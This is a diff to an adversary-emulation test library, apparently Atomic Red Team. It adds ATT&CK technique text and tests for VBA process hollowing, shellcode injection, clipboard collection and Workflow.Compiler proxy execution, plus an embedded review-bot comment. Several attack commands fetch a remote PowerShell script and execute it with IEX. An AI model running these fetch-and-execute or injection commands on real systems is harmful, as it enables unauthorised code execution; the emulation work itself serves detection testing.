diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index 4594e14d..e7fee8c7 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -101,7 +101,7 @@ atomic_tests:
cleanup_command: |
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
- name: Task Scheduler via VBA
- auto_generated_guid:
+ auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run
diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md
index 4cd266ca..13759f6c 100644
--- a/atomics/T1055.012/T1055.012.md
+++ b/atomics/T1055.012/T1055.012.md
@@ -10,6 +10,8 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
- [Atomic Test #1 - Process Hollowing using PowerShell](#atomic-test-1---process-hollowing-using-powershell)
+- [Atomic Test #2 - RunPE via VBA](#atomic-test-2---runpe-via-vba)
+
@@ -49,4 +51,51 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
+
+
+
+## Atomic Test #2 - RunPE via VBA
+This module executes calc.exe from within the WINWORD.EXE process
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ms_product | Maldoc application Word | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft #{ms_product} must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml
index 6bef6dbc..de8d7afe 100644
--- a/atomics/T1055.012/T1055.012.yaml
+++ b/atomics/T1055.012/T1055.012.yaml
@@ -34,7 +34,7 @@ atomic_tests:
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
- name: RunPE via VBA
- auto_generated_guid:
+ auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: |
This module executes calc.exe from within the WINWORD.EXE process
supported_platforms:
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 30321a38..dc781f76 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -10,6 +10,8 @@ More sophisticated samples may perform multiple process injections to segment mo
- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
+- [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba)
+
@@ -57,4 +59,50 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
+
+
+
+## Atomic Test #2 - Shellcode execution via VBA
+This module injects shellcode into a newly created process and executes. By default the shellcode is created,
+with Metasploit, for use on x86-64 Windows 10 machines.
+
+Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
+is required.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The 64-bit version of Microsoft Office must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index b97c2f1d..3d75a255 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -35,7 +35,7 @@ atomic_tests:
name: powershell
elevation_required: true
- name: Shellcode execution via VBA
- auto_generated_guid:
+ auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
description: |
This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md
index c1e605f5..90768a2d 100644
--- a/atomics/T1056.001/T1056.001.md
+++ b/atomics/T1056.001/T1056.001.md
@@ -7,7 +7,8 @@ Keylogging is the most prevalent type of input capture, with many different ways
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
-* Custom drivers.
+* Custom drivers.
+* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)
## Atomic Tests
diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md
index 2a4d379f..a5a12710 100644
--- a/atomics/T1056.002/T1056.002.md
+++ b/atomics/T1056.002/T1056.002.md
@@ -1,6 +1,6 @@
# T1056.002 - GUI Input Capture
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/002)
-Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).
+Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).
diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md
index aa4127f1..f748438d 100644
--- a/atomics/T1059.002/T1059.002.md
+++ b/atomics/T1059.002/T1059.002.md
@@ -1,10 +1,12 @@
# T1059.002 - AppleScript
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/002)
-Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.
+Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
-osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
+Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
-Adversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006)(Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here".
+AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
+
+Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)
## Atomic Tests
diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md
index 6c5c879f..334ad38e 100644
--- a/atomics/T1059.003/T1059.003.md
+++ b/atomics/T1059.003/T1059.003.md
@@ -14,7 +14,7 @@ Adversaries may leverage cmd.exe to execute various commands and pa
## Atomic Test #1 - Create and Execute Batch Script
-Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again.
+Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.
**Supported Platforms:** Windows
diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md
index eae563f3..8863238d 100644
--- a/atomics/T1059.005/T1059.005.md
+++ b/atomics/T1059.005/T1059.005.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
-Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
+Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
@@ -12,6 +12,8 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
- [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution)
+- [Atomic Test #3 - Extract Memory via VBA](#atomic-test-3---extract-memory-via-vba)
+
@@ -112,4 +114,57 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
+
+
+
+## Atomic Test #3 - Extract Memory via VBA
+This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
+we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
+memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ms_product | Maldoc application Word | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft #{ms_product} must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml
index 53b543be..73a171ac 100644
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -61,7 +61,7 @@ atomic_tests:
name: powershell
- name: Extract Memory via VBA
- auto_generated_guid:
+ auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
description: |
This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md
index 380be0f8..0d630a36 100644
--- a/atomics/T1070.003/T1070.003.md
+++ b/atomics/T1070.003/T1070.003.md
@@ -1,10 +1,16 @@
# T1070.003 - Clear Command History
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/003)
-In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done.
+In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
-These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
+On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
-Adversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history.
+Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
+
+On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
+
+The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
+
+Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
## Atomic Tests
diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md
index 4c42e643..625bd04f 100644
--- a/atomics/T1095/T1095.md
+++ b/atomics/T1095/T1095.md
@@ -2,7 +2,8 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1095)
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
-ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)
+ Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
## Atomic Tests
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index f2b17cd7..ddfcb084 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
@@ -12,6 +12,8 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
- [Atomic Test #3 - Execute commands from clipboard](#atomic-test-3---execute-commands-from-clipboard)
+- [Atomic Test #4 - Collect Clipboard Data via VBA](#atomic-test-4---collect-clipboard-data-via-vba)
+
@@ -92,4 +94,56 @@ $(pbpaste)
+
+
+
+## Atomic Test #4 - Collect Clipboard Data via VBA
+This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ms_product | Maldoc application Word | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft #{ms_product} must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
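Review bot: The Check Prereq Commands for Test #4 run `Stop-Process -Name $process`, which terminates every `winword.exe` on the host, not just the instance the check just spawned, so a user's open document can be killed by a prereq check; the `$process` mapping also only handles Word, so any other `ms_product` value would pass a product name rather than an image name to Stop-Process. Prefer closing the COM instance you created: `$app = New-Object -COMObject "#{ms_product}.Application"`, `$app.Quit()`, `exit 0`. Separately, the attack command fetches `Invoke-MalDoc.ps1` from the `master` branch with `IEX (iwr ...)` and no pinned commit or hash, so the executed code can change underneath this test; consider pinning a commit in the URL. Since this .md is generated from T1115.yaml, the fix belongs in the yaml as well.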
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml
index dce7f02a..f8191383 100644
--- a/atomics/T1115/T1115.yaml
+++ b/atomics/T1115/T1115.yaml
@@ -37,7 +37,7 @@ atomic_tests:
$(pbpaste)
name: bash
- name: Collect Clipboard Data via VBA
- auto_generated_guid:
+ auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
description: |
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
supported_platforms:
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index eaace638..51d74750 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -2,9 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1135)
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
-File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.
-
-Cloud virtual networks may contain remote network shares or file storage services accessible to an adversary after they have obtained access to a system. For example, AWS, GCP, and Azure support creation of Network File System (NFS) shares and Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File servers on Compute Engine)
+File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.
## Atomic Tests
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index 42998236..f81368ed 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1201)
Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
-Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
+Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
## Atomic Tests
diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md
index 82a817b0..8284a94a 100644
--- a/atomics/T1218.002/T1218.002.md
+++ b/atomics/T1218.002/T1218.002.md
@@ -1,10 +1,12 @@
# T1218.002 - Control Panel
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/002)
-Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
+Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
-For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
+Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)
-Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
+
+Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)
## Atomic Tests
diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md
index d82855fd..6fcb3da3 100644
--- a/atomics/T1218.003/T1218.003.md
+++ b/atomics/T1218.003/T1218.003.md
@@ -4,7 +4,7 @@
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
-CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
+CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
## Atomic Tests
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 256f8447..738c180b 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -14,6 +14,10 @@
- [Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File](#atomic-test-5---protocolhandlerexe-downloaded-a-suspicious-file)
+- [Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution](#atomic-test-6---microsoftworkflowcompilerexe-payload-execution)
+
+- [Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions](#atomic-test-7---renamed-microsoftworkflowcompilerexe-payload-executions)
+
@@ -214,4 +218,90 @@ write-host "Install Microsoft Word or provide correct path."
+
+
+
+## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution
+Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Set-Location -path PathToAtomicsFolder\T1218\src ;
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: .Net must be installed for this test to work correctly.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe ) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+write-host ".Net must be installed for this test to work correctly."
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions
+Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| xml_payload | XML to execution | path | PathToAtomicsFolder\T1218\src\T1218.xml|
+| renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder\T1218\src\svchost.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Set-Location -path PathToAtomicsFolder\T1218\src ;
+#{renamed_binary} #{xml_payload} output.txt
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: .Net must be installed for this test to work correctly.
